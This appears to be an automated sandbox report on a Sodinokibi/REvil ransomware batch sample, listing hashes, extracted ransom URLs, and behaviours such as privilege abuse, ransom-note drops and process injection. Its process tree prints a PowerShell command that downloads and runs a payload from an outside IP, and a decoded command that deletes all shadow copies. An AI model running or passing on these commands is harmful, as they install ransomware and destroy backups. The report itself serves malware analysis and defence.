Analysis
max time kernel: 37s
max time network: 37s
platform: windows7_x64
resource: win7v200430
submitted: 20-06-2020 08:10
Static task: static1
Behavioral task: behavioral1
  Sample: f4bc334e44b117b825bf6ea74bf8306a.bat
  Resource: win7v200430
Behavioral task: behavioral2
  Sample: f4bc334e44b117b825bf6ea74bf8306a.bat
  Resource: win10
General
Target: f4bc334e44b117b825bf6ea74bf8306a.bat
Size: 213B
MD5: 77b3d11eb5df3e1e5555caf2db33be1c
SHA1: 1e66e03c4214e808d5d4b796d372938862be3cbd
SHA256: 94d5147f9349eb4d28ca422092c7f0d81b4085c4ca82d9a88e465ae8d38edea0
SHA512: dba1003d91200c9f488ecf18ef70bd5177914c9a69d811185bcff4a7e0512419db4a7698cfc1a8618677c12d8f8d9b5322102e4bf8898a2c5314d48e34da7606
Malware Config
Extracted: http://185.103.242.78/pastes/f4bc334e44b117b825bf6ea74bf8306a
Extracted: C:\2nrqa8l7-readme.txt
  sodinokibi
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5E94B57D9460FBBB
  http://decryptor.cc/5E94B57D9460FBBB
Signatures

Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.

Enumerates connected drives (3 TTPs)

Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes:
  description                      pid   process
  Token: SeDebugPrivilege          1460  powershell.exe
  Token: SeDebugPrivilege          1460  powershell.exe
  Token: SeDebugPrivilege          1044  powershell.exe
  Token: SeBackupPrivilege         1760  vssvc.exe
  Token: SeRestorePrivilege        1760  vssvc.exe
  Token: SeAuditPrivilege          1760  vssvc.exe
  Token: SeTakeOwnershipPrivilege  1460  powershell.exe

Blacklisted process makes network request (1 IoCs)
Processes:
  flow  pid   process
  3     1460  powershell.exe

Drops file in Program Files directory (18 IoCs)
Processes:
  description                   ioc                                                                                    process
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\2nrqa8l7-readme.txt          powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\2nrqa8l7-readme.txt  powershell.exe
  File opened for modification  \??\c:\program files\RegisterDebug.php                                                     powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\2nrqa8l7-readme.txt               powershell.exe
  File opened for modification  \??\c:\program files\StepSave.dotm                                                         powershell.exe
  File opened for modification  \??\c:\program files\SuspendRestore.3gp                                                    powershell.exe
  File opened for modification  \??\c:\program files\UseAssert.svgz                                                        powershell.exe
  File opened for modification  \??\c:\program files\InitializeReceive.css                                                 powershell.exe
  File opened for modification  \??\c:\program files\AssertRemove.eps                                                      powershell.exe
  File opened for modification  \??\c:\program files\ConnectSet.kix                                                        powershell.exe
  File opened for modification  \??\c:\program files\ConvertFromResize.dotx                                                powershell.exe
  File opened for modification  \??\c:\program files\TraceBackup.m1v                                                       powershell.exe
  File created                  \??\c:\program files\2nrqa8l7-readme.txt                                                   powershell.exe
  File opened for modification  \??\c:\program files\InvokeSave.pub                                                        powershell.exe
  File opened for modification  \??\c:\program files\LockSelect.ppsm                                                       powershell.exe
  File opened for modification  \??\c:\program files\StepConvert.mpeg                                                      powershell.exe
  File opened for modification  \??\c:\program files\SwitchMount.pptm                                                      powershell.exe
  File created                  \??\c:\program files (x86)\2nrqa8l7-readme.txt                                             powershell.exe

Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
Processes:
  description      ioc                                                                                                                                                             process
  Set value (str)  \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\nb6.bmp"  powershell.exe

Suspicious use of WriteProcessMemory (8 IoCs)
Processes:
  description                       pid   process         target process
  PID 1356 wrote to memory of 1460  1356  cmd.exe         powershell.exe
  PID 1356 wrote to memory of 1460  1356  cmd.exe         powershell.exe
  PID 1356 wrote to memory of 1460  1356  cmd.exe         powershell.exe
  PID 1356 wrote to memory of 1460  1356  cmd.exe         powershell.exe
  PID 1460 wrote to memory of 1044  1460  powershell.exe  powershell.exe
  PID 1460 wrote to memory of 1044  1460  powershell.exe  powershell.exe
  PID 1460 wrote to memory of 1044  1460  powershell.exe  powershell.exe
  PID 1460 wrote to memory of 1044  1460  powershell.exe  powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
Processes:
  pid   process
  1460  powershell.exe

Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes:
  pid   process
  1460  powershell.exe
  1460  powershell.exe
  1460  powershell.exe
  1044  powershell.exe
  1044  powershell.exe

Modifies service (2 TTPs, 4 IoCs)
Processes:
  description  ioc                                                                                     process
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer                  vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer                vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer                       vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer  vssvc.exe
Processes

- C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\f4bc334e44b117b825bf6ea74bf8306a.bat"
  - Suspicious use of WriteProcessMemory
  PID: 1356

  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/f4bc334e44b117b825bf6ea74bf8306a');Invoke-NQONAR;Start-Sleep -s 10000"
    - Suspicious use of AdjustPrivilegeToken
    - Blacklisted process makes network request
    - Drops file in Program Files directory
    - Sets desktop wallpaper using registry
    - Suspicious use of WriteProcessMemory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    PID: 1460

    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (The -e argument is base64-encoded UTF-16LE; it decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} , which is the shadow-copy deletion that accounts for the vssvc.exe activity below.)
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
      PID: 1044

- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service
  PID: 1760